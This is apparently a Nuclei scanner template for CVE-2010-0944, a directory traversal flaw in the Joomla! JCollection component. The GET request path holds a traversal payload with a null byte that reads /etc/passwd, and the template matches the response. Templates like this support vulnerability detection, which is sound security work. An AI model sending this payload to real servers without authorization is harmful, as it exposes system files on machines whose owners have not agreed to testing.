45 lines
1.7 KiB
YAML
45 lines
1.7 KiB
YAML
id: CVE-2010-0944
|
|
|
|
info:
|
|
name: Joomla! Component com_jcollection - Directory Traversal
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to read arbitrary files on the server.
|
|
remediation: Apply all relevant security patches and product upgrades.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/11088
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-0944
|
|
- http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt
|
|
- http://www.exploit-db.com/exploits/11088
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55514
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2010-0944
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00477
|
|
epss-percentile: 0.75733
|
|
cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: thorsten_riess
|
|
product: com_jcollection
|
|
tags: cve2010,cve,joomla,lfi,edb,packetstorm,thorsten_riess
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450221008f1855af5bb1a227548d57889794aa0e4980ed4ad2d957a76ddae12c2637d95a02204db4794c8d6b70b3353904e9c69d9c72140784e582490844f39f61760ba387cd:922c64590222798bb761d5b6d8e72950 |